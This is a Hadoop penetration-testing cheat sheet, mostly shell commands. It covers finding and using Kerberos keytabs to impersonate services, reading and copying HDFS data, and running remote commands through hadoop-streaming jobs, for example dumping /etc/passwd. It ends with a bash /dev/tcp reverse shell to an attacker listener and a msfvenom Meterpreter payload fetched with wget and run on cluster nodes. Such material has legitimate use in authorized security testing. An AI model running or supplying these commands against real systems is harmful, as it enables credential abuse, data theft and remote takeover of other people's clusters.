Apache Hadoop Pentesting

Last modified: 2023-04-02


Apache Hadoop is a collection of open-source software utilities that facilitate using a network of many computers to solve problems involving massive amounts of data and computation. By default, Hadoop 2.x uses ports 8020, 9000, 50010, 50020, 50070, 50075, and 50475. Hadoop 3.x moved several of these (for example, the NameNode web UI moved from 50070 to 9870).

Authenticate using Keytab

Keytab files are used to authenticate to the KDC (Key Distribution Center) in Kerberos authentication. To find them, run the following command on the target system. The pattern is quoted so that the shell does not expand it before find sees it.

find / -type f -name '*.keytab' 2>/dev/null
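
Finding a keytab does not mean the current user can read it. As a minimal sketch, the search can be wrapped so that each result is marked as readable or not. The function names `find_keytabs` and `report_keytabs` are hypothetical and not part of any Kerberos or Hadoop tooling.

```shell
# Hypothetical helper: list keytab files under a search root (default: /).
find_keytabs() {
    # The quoted pattern is passed to find unexpanded.
    find "${1:-/}" -type f -name '*.keytab' 2>/dev/null
}

# Hypothetical helper: report whether the current user can read each keytab.
report_keytabs() {
    find_keytabs "$1" | while IFS= read -r keytab; do
        if [ -r "$keytab" ]; then
            echo "readable: $keytab"
        else
            echo "unreadable: $keytab"
        fi
    done
}
```

For example, `report_keytabs /etc` limits the search to /etc, which is usually much faster than scanning the whole file system.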

After finding them, we can use them to gather information or authenticate.

# Gather information from a keytab
# -k: List the keys held in a keytab file
klist -k /path/to/example.keytab

# Authenticate to the Kerberos server and request a ticket.
# <principal_name>: It's stored in example.keytab. Run `klist -k example.keytab` to check it.
# -k: Use a keytab
# -V: Verbose mode
# -t <keytab_file>: Filename of the keytab to use
kinit <principal_name> -k -V -t /path/to/example.keytab
# e.g.
kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab
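
A keytab can hold several principals, so it may help to extract the names before choosing one for kinit. The sketch below assumes the plain `klist -k` layout of MIT Kerberos (three header lines, then rows of KVNO and principal). The function name `keytab_principals` is hypothetical, and the parsing would need adjusting if extra klist flags add columns.

```shell
# Hypothetical helper: print the unique principals found in `klist -k` output.
# Assumption: input on stdin has three header lines, then "<KVNO> <principal>" rows.
keytab_principals() {
    awk 'NR > 3 && NF >= 2 { print $2 }' | sort -u
}
```

Usage: `klist -k /path/to/example.keytab | keytab_principals`. Each printed name can then be passed to kinit as <principal_name>.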

Impersonate Another Hadoop Service

We can authenticate as other services by running klist and kinit with their keytabs. Then we can investigate the HDFS service with the following HDFS commands.

HDFS Commands

Find HDFS Binary Path

Once authenticated, we need to find the path of the hdfs command that ships with Hadoop. This command lets us run file system commands against the data lake.
If its directory is already in PATH (check by running echo $PATH), we don't need to search for it. Otherwise, find it by running the following command.

find / -type f -name hdfs 2>/dev/null

Once we find the binary, go to its directory and use the commands below.
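
The PATH check and the fallback search can be combined. This is a minimal sketch; the function name `hdfs_bin_dir` is hypothetical, and it simply takes the first match that find returns.

```shell
# Hypothetical helper: print the directory that holds the hdfs binary.
# Checks PATH first, then falls back to searching under a root (default: /).
hdfs_bin_dir() {
    found=$(command -v hdfs 2>/dev/null)
    if [ -z "$found" ]; then
        found=$(find "${1:-/}" -type f -name hdfs 2>/dev/null | head -n 1)
    fi
    # Print nothing and return non-zero if no binary was found.
    [ -n "$found" ] && dirname "$found"
}
```

Instead of changing directory, the result can be added to PATH for the current session, for example `export PATH="$(hdfs_bin_dir):$PATH"`.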

HDFS Command Cheat Sheet

Please refer to https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HDFSCommands.html#Overview

As mentioned above, if the directory of the hdfs binary is not in PATH, we need to go to the directory where the binary exists.
Most hdfs dfs commands are similar to their UNIX counterparts.

hdfs dfs -help

# List files in the hdfs service root.
hdfs dfs -ls /
# -R: Recursive
hdfs dfs -ls -R /
# Get the contents of the file
hdfs dfs -cat /example.txt
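
Besides reading a file with -cat, we can copy it to the local file system with `hdfs dfs -get` for offline review. The sketch below wraps that command; the function name `hdfs_fetch` and the default directory /tmp/hdfs_files are hypothetical choices.

```shell
# Hypothetical helper: copy one HDFS file into a local directory.
# $1: HDFS path of the file, $2: local destination directory (assumed default below).
hdfs_fetch() {
    src=$1
    dest_dir=${2:-/tmp/hdfs_files}
    mkdir -p "$dest_dir" || return 1
    hdfs dfs -get "$src" "$dest_dir/$(basename "$src")"
}
```

For example, `hdfs_fetch /example.txt` would save the file as /tmp/hdfs_files/example.txt.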

RCE (Remote Code Execution)

Reference: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools Techniques and Procedures/Executing remote commands

First, we need to create an arbitrary file that contains at least one character, then put it on HDFS.

echo hello > /tmp/hello.txt
hdfs dfs -put /tmp/hello.txt /tmp/hello.txt

Now run the command below to execute a remote command.
Note that the -output directory must NOT already exist, so to execute multiple commands, we have to delete the previous output directory or specify another name each time.

hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE

We can see the result of the command in the output directory. For example,

hdfs dfs -ls /tmp/output
hdfs dfs -cat /tmp/output/part-00000
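
Because the -output directory must not exist, a fresh name can be generated for every run instead of deleting the old directory. The following is a minimal sketch under that assumption. The function names `fresh_output_dir` and `run_streaming_cmd` are hypothetical, and two calls made within the same second from the same shell would produce the same name.

```shell
# Hypothetical helper: build an output path from a prefix, a timestamp, and the shell PID.
fresh_output_dir() {
    echo "${1:-/tmp/output}_$(date +%s)_$$"
}

# Hypothetical wrapper: run one command as the mapper and print every part file.
# $1: path to the hadoop-streaming jar, $2: command to run as the mapper.
run_streaming_cmd() {
    out=$(fresh_output_dir)
    hadoop jar "$1" -input /tmp/hello.txt -output "$out" -mapper "$2" -reducer NONE &&
        hdfs dfs -cat "$out/part-*"
}
```

Usage: `run_streaming_cmd /path/to/hadoop-streaming-x.x.x.jar "cat /etc/passwd"`. The glob is quoted so that hdfs, not the local shell, expands it.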

Reverse Shell

On the target machine, create a reverse shell script and put it on HDFS.

echo '/bin/bash -i >& /dev/tcp/<local-ip>/4444 0>&1' > /tmp/shell.sh
hdfs dfs -put /tmp/shell.sh /tmp/shell.sh

On the local machine, start a listener.

nc -lvnp 4444

Now execute the following command.

# -mapper: The command each map task runs (here, shell.sh)
# -file: The local path of shell.sh, shipped to the compute nodes with the job
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh"  -background

We should get a shell on the local machine.

Reverse Shell (MsfVenom)

First, create a reverse shell payload with msfvenom on the local machine and prepare a listener with msfconsole.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=4444 -f elf > shell.elf

msf> use exploit/multi/handler
msf> set payload linux/x86/meterpreter/reverse_tcp
msf> set lhost <local-ip>
msf> set lport 4444
msf> run

Transfer the payload to the target machine.

wget <payload-url> -O /tmp/shell.elf
# Put it on HDFS.
hdfs dfs -put /tmp/shell.elf /tmp/shell.elf

Now execute the following command.

# -mapper: The command each map task runs (here, shell.elf)
# -file: The local path of shell.elf, shipped to the compute nodes with the job
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf"  -background

We get a Meterpreter session. To spawn an OS shell, run the shell command in Meterpreter.